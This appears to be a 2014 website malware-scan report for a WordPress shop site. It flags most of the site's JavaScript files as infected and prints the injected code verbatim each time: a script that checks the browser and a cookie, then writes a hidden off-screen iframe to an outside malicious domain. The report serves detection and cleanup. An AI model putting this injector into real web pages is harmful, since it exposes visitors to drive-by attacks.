Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=themarketsquare.ie
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://themarketsquare.ie/ | 200 OK Content-Length: 131326 Content-Type: text/html | clean |
https://themarketsquare.ie/wp-content/plugins/jquery-updater/js/jquery-2.1.1.min.js?ver=2.1.1 | 200 OK Content-Length: 85286 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b( ...[3084 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/plugins/wordpress-ecommerce/marketpress-includes/js/ajax-cart.js?ver=2.9.5.3 | 200 OK Content-Length: 7049 Content-Type: application/x-javascript | clean |
https://themarketsquare.ie/wp-content/themes/Canyon/js/effects.js?ver=4.0 | 200 OK Content-Length: 1544 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() jQuery(document).ready(function() { jQuery('.squarebanner ul li:nth-child(even)').ad ...[330 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/themes/Canyon/js/superfish.js?ver=4.0 | 200 OK Content-Length: 4124 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() (function($){$.fn.superfish=function(op){var sf=$.fn.superfish,c=sf.c,$arrow=$(['<span class="',c.arrowCl ...[2758 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/themes/Canyon/js/jquery.flexslider-min.js?ver=4.0 | 200 OK Content-Length: 12174 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() (function(a){a.flexslider=function(c,b){var d=c;d.init=function(){d.vars=a.extend({},a.flexslider.defaults,b ...[3058 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/themes/Canyon/js/jquery.easing.1.3.js?ver=4.0 | 200 OK Content-Length: 9138 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOut ...[3376 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8241 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.con ...[3191 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
http://www.google.com/jsapi?ver=4.0 | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
https://themarketsquare.ie/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 16289 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() !function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):e("undefined"!= ...[3200 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3 | 200 OK Content-Length: 10699 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() (function($) { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $. ...[3381 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/plugins/js-banner-rotate//includes/jsbrotate.js?ver=2.0.2 | 200 OK Content-Length: 3173 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() var ImageRotator = function (options) { var currentImage = 0, fadeDuration = 4, fa ...[1635 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/plugins/social/assets/social.js?ver=2.11 | 200 OK Content-Length: 15408 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() (function($) { var c = document.getElementsByTagName('html')[0]; c.className += ' social-js' ...[3379 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
https://themarketsquare.ie/wp-content/plugins/wp-polls/polls-js.js?ver=2.67 | 200 OK Content-Length: 4035 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() var poll_id=0,poll_answer_id="",is_being_voted=!1;pollsL10n.show_loading=parseInt(pollsL10n.show_loading);po ...[3045 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
http://themarketsquare.ie/wp-content/plugins/wp-cycle/jquery.cycle.all.min.js?ver=2.9999.5 | 200 OK Content-Length: 34648 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fluersutel.harrisoncarlos.net ...[109 bytes skipped]... )/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function RuizePlastica(){var e=navigator.userAgent;var t=e.indexOf("rv:11.0")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Xbox")>-1||e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows")<+1;var n=getCookie("Glosignal18bob")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe>');var r=new Date((new Date).getTime()+66*60*60*1e3);document.cookie="Glosignal18bob=1; path=/; expires="+r.toUTCString()}}RuizePlastica() ;(function($,undefined){"use strict";var ver='2.9999.5';if($.support===undefined){$.support={opacity:!($.bro ...[3038 bytes skipped]... Decoded script: <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"></iframe> Malicious iFrame found. size: 100x100 src: http://fluersutel.harrisoncarlos.net/signulita16.html This URL is marked by Google as suspicious <iframe src="http://fluersutel.harrisoncarlos.net/signulita16.html" style="left: -905px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -905px;"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: themarketsquare.ie
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Wed, 17 Sep 2014 02:14:23 GMT
Server: Apache/2.2.11 (Unix)
Vary: Accept-Encoding,Cookie
Content-Length: 131326
Content-Type: text/html; charset=UTF-8
Last-Modified: Tue, 16 Sep 2014 22:31:50 GMT
WP-Super-Cache: Served supercache file from PHP
...131326 bytes of data.
GET / HTTP/1.1
Host: themarketsquare.ie
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Wed, 17 Sep 2014 02:14:23 GMT
Server: Apache/2.2.11 (Unix)
Vary: Accept-Encoding,Cookie
Content-Length: 131326
Content-Type: text/html; charset=UTF-8
Last-Modified: Tue, 16 Sep 2014 22:31:50 GMT
WP-Super-Cache: Served supercache file from PHP
...131326 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: themarketsquare.ie
Referer: http://www.google.com/search?q=themarketsquare.ie
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: themarketsquare.ie
Referer: http://www.google.com/search?q=themarketsquare.ie
Result:
The result is similar to the first query. There are no suspicious redirects found.